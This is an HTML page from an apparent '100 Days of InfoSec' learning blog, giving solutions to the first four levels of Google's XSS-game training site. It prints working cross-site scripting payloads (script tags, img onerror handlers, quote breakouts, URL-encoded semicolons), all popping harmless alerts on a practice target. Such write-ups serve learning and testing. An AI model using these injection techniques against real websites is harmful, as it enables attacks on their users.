<html>

<head>
  <meta content="text/html; charset=UTF-8" http-equiv="content-type">
  <title>Day 6</title>
  <style type="text/css">
    @import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEICbzagQlgiMMTcfwSOywUzNl9RG9jbURsXEdpaTs_nuVaEu-9ATAroJ1iN4zmQ55BvhRIWHYCs49SYMOsUv7zk7kYRr1QzF08Cm8LfQFVXJ1');

    ol {
      margin: 0;
      padding: 0
    }

    table td,
    table th {
      padding: 0
    }

    .c2 {
      background-color: #ffffff;
      color: #222222;
      font-weight: 300;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 12pt;
      font-family: "Roboto Mono";
      font-style: normal
    }

    .c3 {
      padding-top: 12pt;
      padding-bottom: 12pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left;
      height: 11pt
    }

    .c0 {
      color: #000000;
      font-weight: 400;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Montserrat";
      font-style: normal
    }

    .c5 {
      padding-top: 14pt;
      padding-bottom: 4pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: right
    }

    .c16 {
      padding-top: 14pt;
      padding-bottom: 4pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .c4 {
      padding-top: 12pt;
      padding-bottom: 12pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .c17 {
      padding-top: 0pt;
      padding-bottom: 0pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: center
    }

    .c21 {
      background-color: #ffffff;
      font-size: 12pt;
      font-family: "Roboto Mono";
      color: #222222;
      font-weight: 300
    }

    .c8 {
      background-color: #ffffff;
      font-size: 12pt;
      font-family: "Courier New";
      color: #222222;
      font-weight: 700
    }

    .c14 {
      background-color: #ffffff;
      font-size: 12pt;
      font-family: "Courier New";
      color: #222222;
      font-weight: 400
    }

    .c12 {
      background-color: #ffffff;
      color: #222222;
      font-weight: 300;
      font-size: 14pt;
      font-family: "Roboto Mono"
    }

    .c1 {
      background-color: #ffffff;
      font-size: 14pt;
      font-family: "Montserrat";
      color: #222222;
      font-weight: 400
    }

    .c10 {
      color: #000000;
      font-weight: 700;
      font-size: 14pt;
      font-family: "Montserrat"
    }

    .c13 {
      color: #000000;
      font-weight: 400;
      font-size: 11pt;
      font-family: "Arial"
    }

    .c19 {
      font-size: 18pt;
      font-family: "Montserrat";
      color: #000000;
      font-weight: 900
    }

    .c20 {
      color: #000000;
      font-weight: 800;
      font-size: 14pt;
      font-family: "Montserrat"
    }

    .c11 {
      font-size: 14pt;
      font-family: "Montserrat";
      font-weight: 700
    }

    .c7 {
      font-size: 14pt;
      font-family: "Montserrat";
      font-weight: 400
    }

    .c9 {
      text-decoration: none;
      vertical-align: baseline;
      font-style: normal
    }

    .c15 {
      background-color: #ffffff;
      max-width: 600pt;
      padding: 72pt 72pt 72pt 72pt;
      margin: auto;
    }

    .c6 {
      height: 14pt
    }

    .c18 {
      color: #434343
    }

    .title {
      padding-top: 0pt;
      color: #000000;
      font-size: 26pt;
      padding-bottom: 3pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .subtitle {
      padding-top: 0pt;
      color: #666666;
      font-size: 15pt;
      padding-bottom: 16pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    li {
      color: #000000;
      font-size: 11pt;
      font-family: "Arial"
    }

    p {
      margin: 0;
      color: #000000;
      font-size: 11pt;
      font-family: "Arial"
    }

    h1 {
      padding-top: 20pt;
      color: #000000;
      font-size: 20pt;
      padding-bottom: 6pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h2 {
      padding-top: 18pt;
      color: #000000;
      font-size: 16pt;
      padding-bottom: 6pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h3 {
      padding-top: 16pt;
      color: #434343;
      font-size: 14pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h4 {
      padding-top: 14pt;
      color: #666666;
      font-size: 12pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h5 {
      padding-top: 12pt;
      color: #666666;
      font-size: 11pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h6 {
      padding-top: 12pt;
      color: #666666;
      font-size: 11pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      font-style: italic;
      orphans: 2;
      widows: 2;
      text-align: left
    }
  </style>
</head>

<body class="c15">
  <h3 class="c5" id="h.3zvpwyx0el37"><span class="c19">6</span><span class="c19"><br>/<br>100<br>Days<br>Of<br>InfoSec</span>
    <hr>
  </h3>
  <h3 class="c16" id="h.qwvdajocmuel"><span class="c9 c20">XSS-game </span></h3>
  <p class="c4"><span class="c7">Taking a break from picoCTF&rsquo;s RE chals, looking at google&rsquo;s XSS-game</span></p>
  <p class="c4"><span class="c11">Level 1 </span></p>
  <p class="c4"><span class="c0">&lt;script&gt;alert(&lsquo;XSS&rsquo;)&lt;/script&gt;</span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 390.67px;"><img alt=""
        src="images/image6day6.png" style="width: 624.00px; height: 390.67px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c3"><span class="c10 c9"></span></p>
  <p class="c4"><span class="c11">Level 2</span></p>
  <p class="c4"><span class="c1 c9">Solution : <br>&lt;img src=a onerror=alert(&lsquo;XSS&rsquo;)&gt;</span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 390.67px;"><img alt=""
        src="images/image3day6.png" style="width: 624.00px; height: 390.67px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c3"><span class="c10 c9"></span></p>
  <p class="c4"><span class="c11">Level 3</span></p>
  <p class="c4"><span class="c1 c9">View &gt; Source : </span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 260.00px;"><img alt=""
        src="images/image1day6.png" style="width: 624.00px; height: 260.00px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c4"><span class="c1">Line 17 : <br></span><span class="c9 c12">&lt;img src=&#39;/static/level3/cloud&quot; + num + &quot;.jpg&#39; /&gt;&quot;;</span></p>
  <p class="c4"><span class="c1">Whatever is at the end of frame# will be inserted into line 17.<br></span><span class="c1">https://xss-game.appspot.com/level3/frame#</span></p>
  <p class="c4"><span class="c1">Solution :<br></span><span class="c12">1&rsquo; onerror=alert(&ldquo;xss&rdquo;)//</span><span class="c1"><br><br>Which creates the following string : <br>&ldquo;</span><span class="c12 c9">&lt;img
      src=&rsquo;/static/level3/cloud1&rsquo; onerror=alert(&ldquo;xss&rdquo;) //.jpg&rsquo; /&gt;&rdquo;; </span></p>
  <p class="c3"><span class="c9 c10"></span></p>
  <p class="c4"><span class="c10 c9">Level 4</span></p>
  <p class="c4"><span class="c1 c9">Inspect &gt; loading gif :</span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 390.67px;"><img alt=""
        src="images/image4day6.png" style="width: 624.00px; height: 390.67px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c4"><span class="c14">&lt;img src=&quot;/static/loading.gif&quot;onload=&quot;</span><span class="c8">startTimer(&#39;&#39;);</span><span class="c14">&quot; /&gt;</span></p>
  <p class="c4"><span class="c1">Timer = 3 :<br></span><span class="c2">&lt;img src=&quot;/static/loading.gif&quot;onload=&quot;startTimer(&#39;3&#39;);&quot; /&gt;</span></p>
  <p class="c4"><span class="c1">Use &lsquo;):<br></span><span class="c21">&lt;img src=&quot;/static/loading.gif&quot;onload=&quot;startTimer(&#39;&#39;)&#39;);&quot; /&gt;</span></p>
  <p class="c4"><span class="c1">Instead use : &#39;);alert(&#39;xss<br></span><span class="c2">src=&quot;/static/loading.gif&quot;onload=&quot;startTimer(&#39;&#39;)alert(&rsquo;xss&rsquo;);&quot; /&gt;</span></p>
  <p class="c4"><span class="c1">Use URL encoded %3B to insert the semi colon : &#39;)%3Balert(&#39;xss<br></span><span class="c2">src=&quot;/static/loading.gif&quot;onload=&quot;startTimer(&#39;&#39;);alert(&rsquo;xss&rsquo;);&quot; /&gt;</span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 390.67px;"><img alt=""
        src="images/image2day6.png" style="width: 624.00px; height: 390.67px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c3"><span class="c1 c9"></span></p>
  <p class="c4"><span class="c1 c9">Well progress, so far!</span></p>
  <p class="c4"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 390.67px;"><img alt=""
        src="images/image5day6.png" style="width: 624.00px; height: 390.67px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span><span
      class="c1 c9"><br></span></p>
  <h3 class="c5 c6" id="h.dardaoz37s2v"><span class="c7 c9 c18"></span></h3>
  <hr>
  <p class="c17"><span class="c0">
      <a href='/100days/day5.html'>Previous</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/'>Home</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/day7.html'>Next</a>
    </span>
  </p>
</body>

</html>